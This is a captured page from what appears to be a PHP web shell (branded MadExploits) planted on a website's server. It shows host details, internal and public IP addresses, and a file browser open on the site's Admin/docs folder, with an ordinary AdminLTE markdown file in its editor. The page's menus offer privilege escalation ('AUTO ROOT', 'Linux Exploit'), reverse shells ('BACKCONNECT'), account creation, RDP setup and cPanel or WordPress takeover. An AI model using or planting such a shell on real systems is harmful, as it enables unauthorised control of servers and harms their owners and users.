Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.144.132.48
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
Admin /
docs /
components /
[ HOME SHELL ]
Name
Size
Permission
Action
boxes.md
10.42
KB
-rw-r--r--
cards.md
16.94
KB
-rw-r--r--
control-sidebar.md
1.79
KB
-rw-r--r--
direct-chat.md
34.52
KB
-rw-r--r--
main-header.md
24.19
KB
-rw-r--r--
main-sidebar.md
3.99
KB
-rw-r--r--
miscellaneous.md
949
B
-rw-r--r--
plugins.md
1.83
KB
-rw-r--r--
ribbons.md
4.29
KB
-rw-r--r--
timeline.md
1.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : control-sidebar.md
--- layout: page title: Control Sidebar Component --- Control sidebar is the right sidebar. It can be used for many purposes and is extremely easy to create. The sidebar ships with two different show/hide styles. The first allows the sidebar to slide over the content. The second pushes the content to make space for the sidebar. Either of these methods can be set through the [Javascript options]({% link javascript/control-sidebar.md %}). The following code should be placed within the `.wrapper` div. I prefer to place it right after the footer. ##### Control Sidebar Push {: .text-bold .text-dark} By adding the `.control-sidebar-push` to `body`, the sidebar pushes the content away instead of overlaying the content. You can also add `.control-sidebar-push-slide` to `body`, to push the content away with an transition. ##### Dark Sidebar Markup {: .text-bold .text-dark} ```html <!-- Control Sidebar --> <aside class="control-sidebar control-sidebar-dark"> <!-- Control sidebar content goes here --> <div class="p-3"> <!-- Content of the sidebar goes here --> </div> </aside> <!-- /.control-sidebar --> ``` ##### Light Sidebar Markup {: .text-bold .text-dark .mt-5} ```html <!-- Control Sidebar --> <aside class="control-sidebar control-sidebar-light"> <!-- Control sidebar content goes here --> <div class="p-3"> <!-- Content of the sidebar goes here --> </div> </aside> <!-- /.control-sidebar --> ``` ##### Control Sidebar Toggle Markup {: .text-bold .text-dark .mt-5} Once you create the sidebar, you will need a toggle button to open/close it. By adding the attribute data-toggle="control-sidebar" to any button, it will automatically act as the toggle button. ```html <a class="nav-link" data-widget="control-sidebar" href="#">Toggle Control Sidebar</a> ```
Close